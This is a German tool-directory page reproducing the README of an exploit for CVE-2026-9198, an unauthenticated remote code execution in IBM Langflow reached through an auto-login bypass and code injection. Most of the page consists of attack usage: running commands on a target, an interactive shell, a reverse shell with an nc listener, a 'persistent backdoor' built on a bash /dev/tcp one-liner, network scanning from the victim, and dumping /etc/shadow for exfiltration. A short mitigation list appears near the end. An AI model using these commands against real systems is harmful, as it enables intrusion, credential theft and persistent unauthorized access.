Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
Payload-GenerierungExploitationWebanwendungs-ExploitationCommand and ControlAuthentifizierungRed TeamingRemote-Access-Tool
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow: Unauthentifizierte RCE durch Auto-Login-Bypass

Repository anzeigen
1vor 27 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Langflow Logo

🚨 CVE-2026-9198

IBM Langflow OSS – Nicht authentifizierte RCE über Auto-Login-Bypass

License: MIT Python 3.6+ Security


📋 Überblick

CVE-2026-9198 ist eine kritische, nicht authentifizierte Remote-Code-Execution-Schwachstelle (RCE) in IBM Langflow OSS. Dieser Exploit verkettet zwei Schwachstellen:

  • CVE-2026-9103: Auto-Login-Bypass, der nicht authentifizierten Aufrufern Superuser-JWT-Tokens gewährt
  • CVE-2026-8481: Code-Injection im Endpunkt /api/v1/validate/code, die beliebige Python-Ausführung ermöglicht

⚠️ WARNUNG: Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Unautorisierte Nutzung ist illegal.


🚀 Funktionen

  • 🔓 Auto-Login-Bypass – Automatischer Abruf eines Superuser-JWT-Tokens
  • 💻 Interaktive Pseudo-Shell – Dynamische Eingabeaufforderung mit Benutzername und aktuellem Verzeichnis
  • 📝 Einzelne Befehlsausführung – Ausführen beliebiger Systembefehle
  • 🔄 Reverse Shell – Zustellung eines Reverse-Shell-Payloads als Einzeiler
  • 🎨 Farbige Ausgabe – Visuelles Feedback mit ANSI-Farben
  • ⚡ Schnell und zuverlässig – Entwickelt mit robuster Fehlerbehandlung

📦 Installation

Voraussetzungen

  • Python 3.6 oder höher
  • pip-Paketmanager

Schritt 1: Repository klonen

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

Schritt 2: Abhängigkeiten installieren

root@kitploit:~
pip install termcolor

Oder installieren Sie alle Abhängigkeiten auf einmal:

root@kitploit:~
pip install -r requirements.txt

Schritt 3: Installation überprüfen

root@kitploit:~
python CVE-2026-9198.py --help

Sie sollten das Hilfemenü mit allen verfügbaren Optionen sehen.


🎯 Verwendung

Einfache Befehlsausführung

Führen Sie einen einzelnen Befehl auf dem Ziel aus:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

Beispiel:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

Interaktive Pseudo-Shell

Starten Sie eine interaktive Shell mit dynamischen Eingabeaufforderungen:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

Funktionen:

  • Dynamische Eingabeaufforderung, die user@host und das aktuelle Verzeichnis anzeigt
  • cd-Befehlsunterstützung mit automatischer Aktualisierung der Eingabeaufforderung
  • Befehlsverlauf (abhängig vom Terminal)
  • Saubere Ausgabeformatierung

Beispielsitzung:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

Reverse Shell

Senden Sie ein Reverse-Shell-Payload an einen Listener:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

Beispiel:

root@kitploit:~
# On your machine - Start listener
nc -lvnp 4444

# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

Benutzerdefinierter Port

Wenn Langflow auf einem nicht standardmäßigen Port läuft:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

Beispiel:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

Verwendung eines zuvor erhaltenen Tokens

Überspringen Sie den Auto-Login-Prozess und verwenden Sie ein vorhandenes Token:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

Timeout-Konfiguration

Passen Sie den HTTP-Timeout für langsamere Netzwerke an:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 Kommandozeilenargumente


🔧 Beispiele

1. Grundlegende Informationssammlung

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. Dateisystem-Erkundung

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd

3. Persistente Backdoor

root@kitploit:~
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. Netzwerkscan (vom Ziel aus)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. Exfiltration sensibler Dateien

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ Gegenmaßnahmen

Zum Schutz vor dieser Schwachstelle:

  1. Deaktivieren Sie den Auto-Login in Produktionsumgebungen
  2. Spielen Sie die Patches ein, die von IBM für Langflow veröffentlicht wurden
  3. Beschränken Sie den Netzwerkzugriff auf Langflow-Verwaltungsschnittstellen
  4. Überwachen Sie ungewöhnliche API-Anfragen an /api/v1/auto_login und /api/v1/validate/code
  5. Verwenden Sie WAF-Regeln, um verdächtige Payload-Muster zu blockieren

⚠️ Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Der Autor ist nicht für Missbrauch oder Schäden verantwortlich, die durch diese Software verursacht werden. Die Benutzer sind allein dafür verantwortlich, die geltenden Gesetze und Vorschriften einzuhalten.


📄 Lizenz

Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe die Datei LICENSE für Details.


👨‍💻 Autor

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • Sicherheitsforscher & Pentester

📚 Referenzen

  • CVE-2026-9198 Details
  • CVE-2026-9103 – Auto-Login-Bypass
  • CVE-2026-8481 – Code-Injection
  • Langflow Offizielle Website

🤝 Mitwirken

Beiträge sind willkommen! Reichen Sie gerne einen Pull Request ein.

  1. Forken Sie das Repository
  2. Erstellen Sie Ihren Feature-Branch (git checkout -b feature/AmazingFeature)
  3. Committen Sie Ihre Änderungen (git commit -m 'Add some AmazingFeature')
  4. Pushen Sie auf den Branch (git push origin feature/AmazingFeature)
  5. Öffnen Sie einen Pull Request

⭐ Star-Verlauf

Wenn Sie dieses Tool nützlich finden, geben Sie ihm bitte einen ⭐ auf GitHub!


Mit ❤️ erstellt von 0xgh057r3c0n
Tool herunterladen
ArgumentBeschreibungErforderlichStandard
-t, --targetZiel-Host/IP oder vollständige URL✅ Ja-
-p, --portLangflow-Port❌ Nein7860
-c, --cmdEinzelnen Befehl ausführen❌ Nein"id"
--shellInteraktiver Pseudo-Shell-Modus❌ NeinFalse
--lhostReverse-Shell-Listener-IP❌ Nein-
--lportReverse-Shell-Listener-Port❌ Nein4444
-k, --tokenBereitgestelltes Bearer-Token verwenden❌ Nein-
--timeoutHTTP-Timeout in Sekunden❌ Nein20
--no-bannerBanner ausblenden❌ NeinFalse